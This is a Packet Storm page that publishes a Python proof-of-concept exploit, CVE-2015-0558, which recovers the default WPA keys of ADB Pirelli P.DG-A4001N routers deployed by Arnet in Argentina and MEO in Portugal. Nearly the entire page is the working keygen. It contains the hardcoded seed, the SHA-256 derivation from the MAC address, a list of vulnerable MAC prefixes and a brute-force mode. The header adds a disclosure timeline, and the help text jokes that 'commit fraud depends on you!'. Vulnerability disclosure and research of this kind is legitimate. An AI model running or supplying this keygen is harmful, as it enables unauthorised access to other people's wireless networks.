exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Pirelli Router P.DG-A4001N WPA Key Reverse Engineering Rev 2

Pirelli Router P.DG-A4001N WPA Key Reverse Engineering Rev 2
Posted May 8, 2015
Authored by Eduardo Novella

This is proof of concept code that demonstrates reverse-engineering of the default WPA key generation algorithm used in ADB broadband Pirelli routers in Argentina and Portugal. Model P.DG-A4001N is affected. This is the second version of the exploit and adds support for MEO routers in Portugal.

tags | exploit, proof of concept
SHA-256 | 713f565efa26dec0805186efd4a9a990744451458398ddb642832bd8ba3c8cce

Pirelli Router P.DG-A4001N WPA Key Reverse Engineering Rev 2

Change Mirror Download
#!/usr/bin/env python
# -*- coding: utf-8 -*-


'''
@license: GPLv3
@author : Eduardo Novella
@contact: ednolo[a]inf.upv.es
@twitter: @enovella_

-----------------
[*] Target :
-----------------
Vendor : ADB broadband Pirelli
Router : Model P.DG-A4001N
ISP : Arnet Telecom Argentina, MEO Portugal
Possible-targets : https://hwaddress.com/?q=ADB%20Broadband%20Italia
Firmware : (ARG) https://foro.seguridadwireless.net/puntos-de-acceso-routers-switchs-y-bridges/obtener-firmware-adb-p-dg-a4001n-%28arnet-telecom-argentina%29/
(POR) https://bitbucket.org/dudux/routerfirmwares

-----------------
[*] References :
-----------------
[0] [AUSTRIA] A1/Telekom Austria PRG EAV4202N Default WPA Key Algorithm Weakness https://sviehb.wordpress.com/2011/12/04/prg-eav4202n-default-wpa-key-algorithm/
[1] [ITALY] Alice AGPF: The algorithm! https://wifiresearchers.wordpress.com/2010/06/02/alice-agpf-lalgoritmo/
[2] [ARGENTINA] CVE-2015-0558: Reverse-engineering the default WPA key generation https://ednolo.alumnos.upv.es/?p=1883
algorithm for Pirelli routers in Argentina
[3] [PORTUGAL] https://ednolo.alumnos.upv.es/?p=2008


----------------------
[*] Test vectors ARG :
----------------------
https://www.arg-wireless.com.ar/index.php?topic=1006.msg6551#msg6551

-----------------------
[*] Acknowledgements :
-----------------------
-> Thanks to fernando3k for giving me the firmware in order to do reverse-engineering on it , and christian32 for showing me a bunch of test vectors.
-> Thanks to Nicolás Chaves for spotting a problem between WLAN, LAN mac addresses.
-> Thanks to Kara Davis for working with me in Portugal Pirelli

-----------------
[*] Timeline :
-----------------
ARGENTINA
================
2014-09-11 Found the algorithm
2014-09-12 Send a message to @ArnetOnline via Twitter @enovella_
2014-09-15 Send a message via website, still looking for a simple mail (https://www.telecom.com.ar/hogares/contacto_tecnico.html)
2014-09-16 Send another message to Arnet via website. First reply via twitter where they redirect me to the website form.
2014-09-19 Direct message via twitter. I talk with them about the critical vulnerability and offer them an email with PGP key
2014-09-20 More twitter PM about the same. They do not want to be aware about the problem though.
2014-09-23 I assume that Arnet does not care about its clients' security at all regarding its little interest.
2014-09-24 I send the problem to the vendor ADB Pirelli via website form
2014-09-28 I send the problem to the vendor ADB Pirelli via email to Switzerland
2015-01-05 Full disclosure and CVE-2015-0558 assigned

PORTUGAL
================
2015-04-01 I receive an email confirming that the Portuguese ISP "MEO" uses the same algorithm
2015-04-05 Send a message to @MEOpt via Twitter @enovella_
2015-04-05 I got response in matter of minutes \o/
2015-04-05 I send an email to luis-oliveira-cc@telecom.pt , stating the reference 3-78405621289 in email subject
2015-05-07 Full disclosure


-----------------
[*] Changelog :
-----------------
2015-05-06 v1.4 Added MEO routers in Portugal. Essid ADSLPT-ABXXXXX
2015-02-01 v1.3 Final version, hopefully
2015-01-12 v1.2 Confusion between LAN and WLAN mac address
2015-01-10 v1.1 --allKeys flag added
2014-09-11 v1.0 First PoC working

'''

import re
import sys
import hashlib
import argparse

VERSION = 1
SUBVERSION = 4
DATEVERSION = '2015-05-06'
URL = 'https://www.ednolo.alumnos.upv.es'

def genkey(mac,stdout='True'):
seed = ('\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15' +
'\xCA\xAF\x12\x84\x02\xAC\x56\x00\x05\xCE\x20\x75\x91\x3F\xDC\xE8')

lookup = '0123456789abcdefghijklmnopqrstuvwxyz'

sha256 = hashlib.sha256()
sha256.update(seed)
sha256.update('1236790')
sha256.update(mac)

digest = bytearray(sha256.digest())

if (stdout):
print "[+] SHA256 : %s" % sha256.hexdigest()

return ''.join([lookup[x % len(lookup)] for x in digest[0:10]])


def printTargets():
print "[+] Possible vulnerable targets so far:"
for t in targets:
print ("\t bssid: {0:s}:XX:XX:XX \t essid: WiFi-Arnet-XXXX, ADSLPT-ABXXXXX".format(t.upper()))

sys.exit()

def checkTargets(bssid):
supported = False
for t in targets:
if ( bssid.upper().startswith(t) ):
supported = True
break
if (not supported):
print "[!] Your bssid looks like not supported! Generating anyway."

def addIncToMac(mac_str, inc):
try:
mac = bytearray.fromhex('%012x' %(int(mac_str,16) + inc))
except:
sys.exit('[!] Use real input :)')
return mac

def main():

global targets
version = " {0:d}.{1:d} [{2:s}] ----> {3:s}".format(VERSION,SUBVERSION,DATEVERSION,URL)
targets = ['00:08:27','00:13:C8','00:17:C2','00:19:3E','00:1C:A2','00:1D:8B','00:22:33','00:8C:54',
'30:39:F2','74:88:8B','84:26:15','A4:52:6F','A4:5D:A1','D0:D4:12','D4:D1:84','DC:0B:1A','F0:84:2F']

parser = argparse.ArgumentParser(description='''>>> PoC WPA keygen for WiFi Networks deployed by Arnet in Argentina and
MEO in Portugal. So far only WiFi networks with essids like WiFi-Arnet-XXXX
or ADSLPT-ABXXXXX and manufactured by Pirelli are likely vulnerable. See
https://ednolo.alumnos.upv.es/ for more details. Twitter: @enovella_ and
email: ednolo[at]inf.upv.es. This software is used just as proof-of-concept,
commit fraud depends on you! ''',
epilog='''(+) Help: python %s -b 74:88:8B:AD:C0:DE ''' %(sys.argv[0])
)

maingroup = parser.add_argument_group(title='required')
maingroup.add_argument('-b','--bssid', type=str, nargs='?', help='Target mac address')
parser.add_argument('-v', '--version', action='version', version='%(prog)s'+version)
command_group = parser.add_mutually_exclusive_group()
command_group.add_argument('-l','--list', help='List all vulnerable targets', action='store_true')
command_group.add_argument('-a','--allkeys', help='Bruteforce mode', action="store_true")


args = parser.parse_args()

if args.list:
printTargets()
elif args.bssid:
mac_str = re.sub(r'[^a-fA-F0-9]', '', args.bssid)
if len(mac_str) != 12:
sys.exit('[!] Check MAC format!\n')
try:

checkTargets(args.bssid)
print '[+] MAC : %s' % args.bssid

if (args.allkeys):
print '\n[+] WPA keys for SSID: WiFi-Arnet-XXXX (Argentina)'
for i in xrange(-2,5):
mac = addIncToMac(mac_str,i)
print '%-10s' % ((genkey(mac, False)))


print '\n[+] WPA keys for SSID: ADSLPT-ABXXXXX (Portugal)'
for i in xrange(-2,5):
mac = addIncToMac(mac_str,i)
print '%-10s' % ((genkey(mac, False)[:8]))

else:
wpa = genkey((addIncToMac(mac_str,0)), False)
print '[+] WPA key : %-10s\t%-10s' % (wpa, "SSID: WiFi-Arnet-XXXX (Argentina)")
print '[+] WPA key : %-10s\t%-10s' % (wpa[:8], "SSID: ADSLPT-ABXXXXX (Portugal)" )

except:
sys.exit('[!] Are you trying to crash me? :)')
else:
parser.print_help()

if __name__ == "__main__":
main()
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close